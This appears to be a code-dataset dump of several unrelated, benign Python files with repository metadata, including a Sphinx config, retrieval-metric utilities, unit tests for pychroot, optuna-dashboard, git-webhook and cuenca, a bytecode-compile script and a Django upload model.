| 36.133333 | 121 | 0.677122 | 295 | 2,168 | 4.813559 | 0.383051 | 0.054225 | 0.039437 | 0.028169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016403 | 0.240775 | 2,168 | 59 | 122 | 36.745763 | 0.846294 | 0.320572 | 0 | 0 | 0 | 0 | 0.082639 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.1 | false | 0 | 0.233333 | 0 | 0.433333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3507cbd3a6c4fd3da709d6ca3898d8b90ebaea | 2,176 | py | Python | docs/conf.py | Yura52/rtdl | 5c768802e71afa622f8f2f0a6e117a75c1b2bf44 | [
"MIT"
] | 25 | 2022-03-10T21:48:50.000Z | 2022-03-30T11:47:27.000Z | docs/conf.py | Yura52/rtdl | 5c768802e71afa622f8f2f0a6e117a75c1b2bf44 | [
"MIT"
] | 1 | 2022-03-14T15:31:34.000Z | 2022-03-15T15:35:07.000Z | docs/conf.py | Yura52/rtdl | 5c768802e71afa622f8f2f0a6e117a75c1b2bf44 | [
"MIT"
] | 1 | 2022-03-21T01:39:19.000Z | 2022-03-21T01:39:19.000Z | import sys
from pathlib import Path

# Add the repository root to PYTHONPATH
rtdl_path = Path.cwd()
while not (rtdl_path.name == 'rtdl' and rtdl_path.parent.name != 'rtdl'):
    rtdl_path = rtdl_path.parent
sys.path.append(str(rtdl_path))

import rtdl  # noqa

# >>> Project information <<<
author = 'rtdl authors'
copyright = '2021, rtdl authors'
project = 'rtdl'
release = rtdl.__version__
version = rtdl.__version__

# >>> General options <<<
default_role = 'py:obj'
pygments_style = 'default'
repo_url = 'https://github.com/Yura52/rtdl'
templates_path = ['_templates']

# >>> Extensions options <<<
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.autosummary',
    'sphinx.ext.doctest',
    'sphinx.ext.intersphinx',
    'sphinx.ext.napoleon',
    'sphinx.ext.viewcode',
    # 'sphinxcontrib.spelling',
    'sphinx_copybutton',
]

autoclass_content = 'both'
autodoc_member_order = 'bysource'
autodoc_inherit_docstrings = False

doctest_global_setup = '''
import numpy as np
import torch
import rtdl
import rtdl.data
from rtdl import *
from rtdl.data import *
'''

intersphinx_mapping = {
    'python': ('https://docs.python.org/3', None),
    'numpy': ('https://numpy.org/doc/stable', None),
    'sklearn': (
        'http://scikit-learn.org/stable',
        (None, './_intersphinx/sklearn-objects.inv'),
    ),
    'torch': ('https://pytorch.org/docs/stable', None),
}

napoleon_numpy_docstring = False
napoleon_use_admonition_for_examples = False

# spelling_show_suggestions = True

# >>> HTML and theme options <<<
import sphinx_material  # noqa

html_static_path = ['_static']
html_theme = 'sphinx_material'
html_css_files = ['custom.css']
html_theme_options = {
    'base_url': 'https://Yura52.github.io/rtdl',
    'color_primary': 'red',
    'globaltoc_collapse': False,
    'globaltoc_depth': 2,
    'logo_icon': '🏠',
    'nav_links': [],
    'nav_title': project + ' ' + version,
    'repo_name': project,
    'repo_url': repo_url,
    'repo_type': 'github',
    'master_doc': False,
    'version_dropdown': True,
    'version_json': '_static/versions.json',
}
html_sidebars = {
    '**': ['logo-text.html', 'globaltoc.html', 'searchbox.html'],
}
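
# Build sketch (editor's note, assuming the standard Sphinx layout implied by
# this file living in docs/):
#   sphinx-build -b html docs docs/_build/html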
| 24.727273 | 73 | 0.67693 | 262 | 2,176 | 5.381679 | 0.477099 | 0.034043 | 0.019858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008786 | 0.163143 | 2,176 | 87 | 74 | 25.011494 | 0.765513 | 0.099265 | 0 | 0.028986 | 0 | 0 | 0.414359 | 0.050769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.144928 | 0 | 0.144928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c391dfbceb5fa6546693e7bc39cfefbf348bba2 | 1,965 | py | Python | misc/util.py | tomfalainen/word_spotting | df1ed0ccf5e2749a4cb67ecd8484674ea9137309 | [
"MIT"
] | 6 | 2016-11-21T20:46:08.000Z | 2020-07-19T05:22:16.000Z | misc/util.py | tomfalainen/word_spotting | df1ed0ccf5e2749a4cb67ecd8484674ea9137309 | [
"MIT"
] | null | null | null | misc/util.py | tomfalainen/word_spotting | df1ed0ccf5e2749a4cb67ecd8484674ea9137309 | [
"MIT"
] | 1 | 2020-04-25T12:13:34.000Z | 2020-04-25T12:13:34.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 11:35:01 2016
@author: tomas
"""
import numpy as np
from scipy.spatial import distance as di
def average_precision(ils, t):
'''
Computes the average precision
Thanks for a fast mAP implementation!
https://github.com/ssudholt/phocnet/blob/master/src/phocnet/evaluation/retrieval.py
'''
ret_vec_relevance = ils == t
ret_vec_cumsum = np.cumsum(ret_vec_relevance, dtype=float)
ret_vec_range = np.arange(1, ret_vec_relevance.size + 1)
ret_vec_precision = ret_vec_cumsum / ret_vec_range
n_relevance = ret_vec_relevance.sum()
if n_relevance > 0:
ret_vec_ap = (ret_vec_precision * ret_vec_relevance).sum() / n_relevance
else:
ret_vec_ap = 0.0
return ret_vec_ap
def MAP(queries, qtargets, db, itargets, metric='cosine'):
APs = []
for q, query in enumerate(queries):
t = qtargets[q] #Get the label for the query
count = np.sum(itargets == t) #Count the number of relevant retrievals in the database
if count == 1:
continue
dists = np.squeeze(di.cdist(query.reshape(1, query.shape[0]), db, metric=metric))
I = np.argsort(dists)
I = I[1:] #Don't count the query, distance is always zero to query
ils = itargets[I] #Sort results after distance to query image
ap = average_precision(ils, t)
APs.append(ap)
return np.mean(APs)
def MAP_qbs(queries, qtargets, db, itargets, metric='cosine'):
APs = []
for q, query in enumerate(queries):
t = qtargets[q] #Get the label for the query
dists = np.squeeze(di.cdist(query.reshape(1, query.shape[0]), db, metric=metric))
I = np.argsort(dists)
ils = itargets[I] #Sort results after distance to query image
ap = average_precision(ils, t)
APs.append(ap)
return np.mean(APs)#, qs
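
# Editor's illustration (not in the original): a tiny worked example of
# average_precision. For ranked relevance [1, 0, 1, 1] against target 1,
# precision at the three relevant ranks is 1/1, 2/3 and 3/4, so
# AP = (1 + 2/3 + 3/4) / 3 ~= 0.806.
if __name__ == '__main__':
    demo = average_precision(np.array([1, 0, 1, 1]), 1)
    assert abs(demo - (1.0 + 2.0 / 3.0 + 3.0 / 4.0) / 3.0) < 1e-12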
| 33.305085 | 105 | 0.625445 | 281 | 1,965 | 4.24911 | 0.370107 | 0.070352 | 0.062814 | 0.050251 | 0.485762 | 0.450586 | 0.450586 | 0.450586 | 0.450586 | 0.450586 | 0 | 0.016678 | 0.267684 | 1,965 | 59 | 106 | 33.305085 | 0.813065 | 0.248346 | 0 | 0.486486 | 0 | 0 | 0.00838 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.054054 | 0 | 0.216216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3c518268665d6d0179b19dd73105314377e71b | 3,329 | py | Python | tests/test_chroot.py | radhermit/pychroot | 8aa38729d7978bd33bca6ff0753f0fba1ce84f85 | [
"BSD-3-Clause"
] | 27 | 2015-08-17T23:33:11.000Z | 2022-02-03T23:14:21.000Z | tests/test_chroot.py | pkgcore/pychroot | 8aa38729d7978bd33bca6ff0753f0fba1ce84f85 | [
"BSD-3-Clause"
] | 35 | 2015-01-31T08:42:48.000Z | 2021-03-16T22:21:27.000Z | tests/test_chroot.py | radhermit/pychroot | 8aa38729d7978bd33bca6ff0753f0fba1ce84f85 | [
"BSD-3-Clause"
] | 8 | 2015-01-31T08:39:40.000Z | 2021-03-17T12:25:40.000Z | import socket
from itertools import chain, cycle
from unittest import mock

from pytest import raises

from pychroot.base import Chroot
from pychroot.exceptions import ChrootError, ChrootMountError


class TestChroot:

    def test_mount(self):
        # testing Chroot.mount()
        with mock.patch('pychroot.base.bind') as bind, \
                mock.patch('os.path.exists') as exists, \
                mock.patch('pychroot.base.dictbool') as dictbool, \
                mock.patch('pychroot.base.simple_unshare'):
            chroot = Chroot('/')
            bind.side_effect = None
            exists.return_value = False
            dictbool.return_value = True
            chroot._mount()
            assert not bind.called

    def test_chroot(self):
        with mock.patch('os.fork') as fork, \
                mock.patch('os.chroot'), \
                mock.patch('os.chdir') as chdir, \
                mock.patch('os.remove') as remove, \
                mock.patch('os._exit'), \
                mock.patch('os.path.exists') as exists, \
                mock.patch('os.waitpid', return_value=(0, 0)), \
                mock.patch('pychroot.utils.mount'), \
                mock.patch('pychroot.base.simple_unshare'):

            # bad path
            exists.return_value = False
            with raises(ChrootError):
                Chroot('/nonexistent/path')
            exists.return_value = True

            # $FAKEVAR not defined in environment
            with raises(ChrootMountError):
                Chroot('/', mountpoints={'$FAKEVAR': {}})

            # no mountpoints
            chroot = Chroot('/', mountpoints=None)
            assert chroot.mountpoints == {}
            assert list(chroot.mounts) == []

            # optional, undefined variable mounts get dropped
            chroot = Chroot('/', mountpoints={
                '$FAKEVAR': {'optional': True},
                '/home/user': {}})
            assert '$FAKEVAR' not in chroot.mounts
            assert len(list(chroot.mounts)) - len(chroot.default_mounts) == 1

            with mock.patch('os.getenv', return_value='/fake/src/path'):
                chroot = Chroot('/', mountpoints={'$FAKEVAR': {}})
            assert '/fake/src/path' in chroot.mountpoints

            exists.side_effect = chain([True], cycle([False]))
            with mock.patch('os.getenv', return_value='/fake/src/path'):
                chroot = Chroot('/', mountpoints={'$FAKEVAR:/fake/dest/path': {}})
            assert chroot.mountpoints['/fake/src/path'].get('create', False)
            exists.side_effect = None
            exists.return_value = True

            # test parent process
            fork.return_value = 10

            # test UTS namespace
            chroot = Chroot('/', hostname='hostname-test')
            with chroot:
                assert socket.gethostname() == 'hostname-test'

            # test child process
            fork.return_value = 0
            chroot = Chroot('/')
            with chroot:
                pass

            # make sure the default mount points aren't altered
            # when passing custom mount points
            default_mounts = dict(Chroot.default_mounts)
            chroot = Chroot('/', mountpoints={'tmpfs:/tmp': {}})
            assert default_mounts == chroot.default_mounts
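
# Editor's note on the side_effect used above: chain([True], cycle([False]))
# makes the mocked os.path.exists return True on its first call and False on
# every call after that, so only the chroot path itself "exists" while the
# mount source path does not, forcing the 'create' flag being asserted.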
| 36.582418 | 82 | 0.549414 | 337 | 3,329 | 5.356083 | 0.287834 | 0.074792 | 0.060942 | 0.046537 | 0.195014 | 0.195014 | 0.122992 | 0.122992 | 0.122992 | 0.080886 | 0 | 0.002687 | 0.329228 | 3,329 | 90 | 83 | 36.988889 | 0.805643 | 0.081406 | 0 | 0.225806 | 0 | 0 | 0.134887 | 0.033476 | 0 | 0 | 0 | 0 | 0.145161 | 1 | 0.032258 | false | 0.016129 | 0.096774 | 0 | 0.145161 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c3cd8c91477e459a2880803218179c3e591a13e | 4,017 | py | Python | tests/test_api.py | SCUTJcfeng/optuna-dashboard | cc74928ba121dc8829d43d83b3c7265388e140c5 | [
"MIT"
] | 1 | 2021-06-07T14:42:29.000Z | 2021-06-07T14:42:29.000Z | tests/test_api.py | SCUTJcfeng/optuna-dashboard | cc74928ba121dc8829d43d83b3c7265388e140c5 | [
"MIT"
] | null | null | null | tests/test_api.py | SCUTJcfeng/optuna-dashboard | cc74928ba121dc8829d43d83b3c7265388e140c5 | [
"MIT"
] | null | null | null | import json
from unittest import TestCase

import optuna

from optuna_dashboard.app import create_app

from .wsgi_client import send_request


class APITestCase(TestCase):
    def test_get_study_summaries(self) -> None:
        storage = optuna.storages.InMemoryStorage()
        storage.create_new_study("foo1")
        storage.create_new_study("foo2")

        app = create_app(storage)
        status, _, body = send_request(
            app,
            "/api/studies/",
            "GET",
            content_type="application/json",
        )
        self.assertEqual(status, 200)

        study_summaries = json.loads(body)["study_summaries"]
        self.assertEqual(len(study_summaries), 2)

    def test_create_study(self) -> None:
        for name, directions, expected_status in [
            ("single-objective success", ["minimize"], 201),
            ("multi-objective success", ["minimize", "maximize"], 201),
            ("invalid direction name", ["invalid-direction", "maximize"], 400),
        ]:
            with self.subTest(name):
                storage = optuna.storages.InMemoryStorage()
                self.assertEqual(len(storage.get_all_study_summaries()), 0)

                app = create_app(storage)
                request_body = {
                    "study_name": "foo",
                    "directions": directions,
                }
                status, _, _ = send_request(
                    app,
                    "/api/studies",
                    "POST",
                    content_type="application/json",
                    body=json.dumps(request_body),
                )
                self.assertEqual(status, expected_status)

                if expected_status == 201:
                    self.assertEqual(len(storage.get_all_study_summaries()), 1)
                else:
                    self.assertEqual(len(storage.get_all_study_summaries()), 0)

    def test_create_study_duplicated(self) -> None:
        storage = optuna.storages.InMemoryStorage()
        storage.create_new_study("foo")
        self.assertEqual(len(storage.get_all_study_summaries()), 1)

        app = create_app(storage)
        request_body = {
            "study_name": "foo",
            "direction": "minimize",
        }
        status, _, _ = send_request(
            app,
            "/api/studies",
            "POST",
            content_type="application/json",
            body=json.dumps(request_body),
        )
        self.assertEqual(status, 400)
        self.assertEqual(len(storage.get_all_study_summaries()), 1)

    def test_delete_study(self) -> None:
        storage = optuna.storages.InMemoryStorage()
        storage.create_new_study("foo1")
        storage.create_new_study("foo2")
        self.assertEqual(len(storage.get_all_study_summaries()), 2)

        app = create_app(storage)
        status, _, _ = send_request(
            app,
            "/api/studies/1",
            "DELETE",
            content_type="application/json",
        )
        self.assertEqual(status, 204)
        self.assertEqual(len(storage.get_all_study_summaries()), 1)

    def test_delete_study_not_found(self) -> None:
        storage = optuna.storages.InMemoryStorage()
        app = create_app(storage)
        status, _, _ = send_request(
            app,
            "/api/studies/1",
            "DELETE",
            content_type="application/json",
        )
        self.assertEqual(status, 404)


class BottleRequestHookTestCase(TestCase):
    def test_ignore_trailing_slashes(self) -> None:
        storage = optuna.storages.InMemoryStorage()
        app = create_app(storage)

        endpoints = ["/api/studies", "/api/studies/"]
        for endpoint in endpoints:
            with self.subTest(msg=endpoint):
                status, _, body = send_request(
                    app,
                    endpoint,
                    "GET",
                    content_type="application/json",
                )
                self.assertEqual(status, 200)
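
# Editor's note: send_request (from .wsgi_client) is consistently unpacked
# above as a (status, headers, body) triple, e.g.:
#   status, _, body = send_request(app, "/api/studies/", "GET",
#                                  content_type="application/json")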
| 33.475 | 79 | 0.557132 | 382 | 4,017 | 5.617801 | 0.204188 | 0.097856 | 0.067102 | 0.081547 | 0.652377 | 0.616496 | 0.616496 | 0.616496 | 0.595527 | 0.421249 | 0 | 0.015327 | 0.33408 | 4,017 | 119 | 80 | 33.756303 | 0.786916 | 0 | 0 | 0.568627 | 0 | 0 | 0.103809 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 1 | 0.058824 | false | 0 | 0.04902 | 0 | 0.127451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c418db05d3fef8d75e9330b1cdb9a852f1d3089 | 389 | py | Python | bench/include/python/compile.py | turururu/Programming-Language-Benchmarks | de58f0ec355cad32fc64c1df5c7125fc584bf3c4 | [
"MIT"
] | null | null | null | bench/include/python/compile.py | turururu/Programming-Language-Benchmarks | de58f0ec355cad32fc64c1df5c7125fc584bf3c4 | [
"MIT"
] | null | null | null | bench/include/python/compile.py | turururu/Programming-Language-Benchmarks | de58f0ec355cad32fc64c1df5c7125fc584bf3c4 | [
"MIT"
] | null | null | null | from py_compile import compile
import os.path


def main():
    for root, dirs, files in os.walk("out"):
        for name in files:
            if name[-3:] == '.py':
                full_path = os.path.join(root, name)
                compile(full_path)
    compile(os.path.join('out', 'app.py'),
            cfile=os.path.join('out', 'app.pyc'))


if __name__ == '__main__':
    main()
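
# Editor's note: py_compile.compile(path) with no cfile argument writes the
# bytecode under __pycache__/ (PEP 3147); the explicit cfile= call above
# instead places app.pyc directly alongside out/app.py.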
| 21.611111 | 52 | 0.539846 | 54 | 389 | 3.685185 | 0.425926 | 0.120603 | 0.150754 | 0.130653 | 0.160804 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003676 | 0.300771 | 389 | 17 | 53 | 22.882353 | 0.727941 | 0 | 0 | 0 | 0 | 0 | 0.084833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c44709b91dce797ff6ef41c356fc2433f6f64a5 | 2,188 | py | Python | tests/conftest.py | modoupi/git-webhook | 4c57f1bfdb4b87183ef4adea30e90dce86fde2fa | [
"MIT"
] | 1,617 | 2016-10-24T03:24:59.000Z | 2022-03-30T08:41:55.000Z | tests/conftest.py | modoupi/git-webhook | 4c57f1bfdb4b87183ef4adea30e90dce86fde2fa | [
"MIT"
] | 54 | 2016-10-26T04:11:02.000Z | 2021-06-16T08:47:41.000Z | tests/conftest.py | modoupi/git-webhook | 4c57f1bfdb4b87183ef4adea30e90dce86fde2fa | [
"MIT"
] | 466 | 2016-10-21T08:36:28.000Z | 2022-03-16T08:02:46.000Z | # -*- coding: utf-8 -*-
import mock
import pytest

from app import app as _app, SQLAlchemyDB
from app.database import model
from app.utils import RequestUtil
import app.utils.SshUtil as ssh

from . import success, load_data


# =====================================
# base fixtures
# =====================================
@pytest.fixture
def app():
    SQLAlchemyDB.create_all()
    yield _app
    SQLAlchemyDB.session.close()
    SQLAlchemyDB.drop_all()


@pytest.fixture
def client(app):
    with app.test_client() as c:
        yield c


@pytest.fixture
def sql(app):
    return SQLAlchemyDB.session


@pytest.fixture
def tester(app, sql):
    """Simulate a logged-in user."""
    with app.test_client() as c:
        user = create_user(sql)
        mock_func = mock.MagicMock(return_value=user.dict())
        with mock.patch.object(RequestUtil, 'get_login_user', new=mock_func):
            yield c


def create_user(sql):
    user_id = 'tester'
    user = model.User(
        id=user_id,
        name=user_id,
        location='',
        avatar=''
    )
    sql.add(user)
    sql.commit()
    return user


# =====================================
# server fixtures
# =====================================
SERVER_DATA = {
    'ip': '127.0.0.1',
    'name': 'dev',
    'port': '22',
    'account': 'root',
    'pkey': 'asdfghjkl',
}


def mock_do_ssh_cmd(*args, **kwargs):
    return True, "OK"


@pytest.fixture
def create_server(tester):
    def func(**kwargs):
        data = SERVER_DATA.copy()
        data.update(kwargs)
        with mock.patch.object(ssh, 'do_ssh_cmd', new=mock_do_ssh_cmd):
            resp = tester.post('/api/server/new', data=data)
        assert success(resp)
        return load_data(resp)
    return func


# =====================================
# webhook fixtures
# =====================================
WEBHOOK_DATA = {
    'repo': 'git-webhook',
    'branch': 'master',
    'shell': 'echo hello',
}


@pytest.fixture
def create_webhook(tester):
    def func(**kwargs):
        data = WEBHOOK_DATA.copy()
        data.update(kwargs)
        resp = tester.post('/api/webhook/new', data=data)
        assert success(resp)
        return load_data(resp)
    return func
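
# Usage sketch (editor's illustration; the test body and the asserted
# response key are hypothetical):
#
# def test_new_webhook(create_webhook):
#     webhook = create_webhook(branch='dev')
#     assert webhook['branch'] == 'dev'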
| 21.038462 | 77 | 0.556673 | 254 | 2,188 | 4.665354 | 0.334646 | 0.065823 | 0.081013 | 0.028692 | 0.207595 | 0.12827 | 0.094515 | 0.094515 | 0.094515 | 0.094515 | 0 | 0.005291 | 0.222578 | 2,188 | 103 | 78 | 21.242718 | 0.691358 | 0.139397 | 0 | 0.28169 | 0 | 0 | 0.081906 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 1 | 0.140845 | false | 0 | 0.098592 | 0.028169 | 0.338028 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c455bc2ee83ec5f1e1a08f4ecaefcb6890e8608 | 1,127 | py | Python | tests/resources/test_savings.py | andreshndz/cuenca-python | ca9f0f078584f1458e71baeb4cd15fcc55b40397 | [
"MIT"
] | 6 | 2020-11-02T21:03:11.000Z | 2022-01-13T23:12:01.000Z | tests/resources/test_savings.py | andreshndz/cuenca-python | ca9f0f078584f1458e71baeb4cd15fcc55b40397 | [
"MIT"
] | 220 | 2020-05-13T19:20:57.000Z | 2022-03-30T22:03:03.000Z | tests/resources/test_savings.py | andreshndz/cuenca-python | ca9f0f078584f1458e71baeb4cd15fcc55b40397 | [
"MIT"
] | 14 | 2020-07-15T15:32:03.000Z | 2021-09-17T19:11:14.000Z | import datetime as dt
import pytest
from cuenca_validations.types import SavingCategory

from cuenca import Saving


@pytest.mark.vcr
def test_saving_create():
    saving = Saving.create(
        name='my new car',
        category=SavingCategory.vehicle,
        goal_amount=100000,
        goal_date=(dt.datetime.utcnow() + dt.timedelta(days=365)),
    )
    assert saving.id is not None
    assert saving.is_active
    assert saving.balance == 0


@pytest.mark.vcr
def test_saving_retrieve():
    saving_id = 'lAob5rOC0jSj6UC5RAbwnSnA'
    saving = Saving.retrieve(saving_id)
    assert saving.id == saving_id


@pytest.mark.vcr
def test_saving_update():
    saving_id = 'lAob5rOC0jSj6UC5RAbwnSnA'
    changes = dict(
        name='my new home',
        goal_amount=200000,
        category=SavingCategory.home,
    )
    saving = Saving.update(saving_id, **changes)
    assert all(item in saving.to_dict().items() for item in changes.items())


@pytest.mark.vcr
def test_saving_deactivate():
    saving_id = 'lAob5rOC0jSj6UC5RAbwnSnA'
    saving = Saving.deactivate(saving_id)
    assert saving.deactivated_at is not None
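
# Editor's note: the @pytest.mark.vcr markers above replay pre-recorded HTTP
# cassettes (via the pytest-vcr / pytest-recording plugin family), so these
# tests exercise the Saving resource without calling the live API.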
| 24.5 | 76 | 0.7063 | 142 | 1,127 | 5.450704 | 0.380282 | 0.093023 | 0.067183 | 0.082687 | 0.248062 | 0.134367 | 0 | 0 | 0 | 0 | 0 | 0.031008 | 0.198758 | 1,127 | 45 | 77 | 25.044444 | 0.826135 | 0 | 0 | 0.2 | 0 | 0 | 0.08252 | 0.063886 | 0 | 0 | 0 | 0 | 0.171429 | 1 | 0.114286 | false | 0 | 0.114286 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c46a38e5c1a4da3e3a918d1e5777fe1cefc53f9 | 1,085 | py | Python | upload/models.py | MTES-MCT/appel | 3b840ccea600ef31cfea57721fe5e6edbdbc2c79 | [
"MIT"
] | null | null | null | upload/models.py | MTES-MCT/appel | 3b840ccea600ef31cfea57721fe5e6edbdbc2c79 | [
"MIT"
] | 2 | 2021-12-15T05:10:43.000Z | 2021-12-15T05:11:00.000Z | upload/models.py | MTES-MCT/appel | 3b840ccea600ef31cfea57721fe5e6edbdbc2c79 | [
"MIT"
] | 1 | 2021-12-28T13:06:06.000Z | 2021-12-28T13:06:06.000Z | import uuid
from rest_framework import serializers

from django.db import models


# Create your models here.
class UploadedFile(models.Model):
    id = models.AutoField(primary_key=True)
    uuid = models.UUIDField(default=uuid.uuid4, editable=False)
    filename = models.CharField(max_length=255, null=True)
    dirpath = models.CharField(max_length=255, null=True)
    size = models.CharField(max_length=255, null=True)
    content_type = models.CharField(max_length=255, null=True)
    cree_le = models.DateTimeField(auto_now_add=True)
    mis_a_jour_le = models.DateTimeField(auto_now=True)

    def filepath(self, convention_uuid):
        if self.dirpath:
            filepath = f"{self.dirpath}/{self.uuid}_{self.filename}"
        else:
            filepath = (
                f"conventions/{convention_uuid}/media/" + f"{self.uuid}_{self.filename}"
            )
        return filepath

    def __str__(self):
        return self.filename


class UploadedFileSerializer(serializers.ModelSerializer):
    class Meta:
        model = UploadedFile
        fields = "__all__"
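
# Editor's illustration of UploadedFile.filepath: with dirpath unset, a file
# resolves to
#   conventions/<convention_uuid>/media/<uuid>_<filename>
# and with dirpath set, to
#   <dirpath>/<uuid>_<filename>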
| 31 | 88 | 0.687558 | 130 | 1,085 | 5.538462 | 0.461538 | 0.083333 | 0.1 | 0.133333 | 0.272222 | 0.194444 | 0.194444 | 0 | 0 | 0 | 0 | 0.015187 | 0.21106 | 1,085 | 34 | 89 | 31.911765 | 0.825935 | 0.02212 | 0 | 0 | 0 | 0 | 0.10576 | 0.09915 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.115385 | 0.038462 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |